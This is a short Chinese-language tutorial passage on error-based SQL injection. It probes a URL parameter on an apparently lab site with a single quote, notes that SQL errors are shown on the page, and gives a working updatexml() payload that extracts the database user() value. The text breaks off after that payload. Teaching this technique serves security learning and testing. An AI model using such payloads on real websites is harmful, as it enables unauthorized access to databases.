1. 报错注入攻击
1)考虑使用报错注入
URL:http://www.tianchi.com/web/error.php?username=1
URL:http://www.tianchi.com/web/error.php?username=1'
由于多了一个',SQL语句执行时会报错。
而这里程序直接将错误信息输出到了页面上,所以可以利用报错注入来获取数据。
2)获取user()的值
报错注入有多种格式,这里使用updatexml()函数,其中0x7e为ASCII编码,解码为~。
语句:' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+</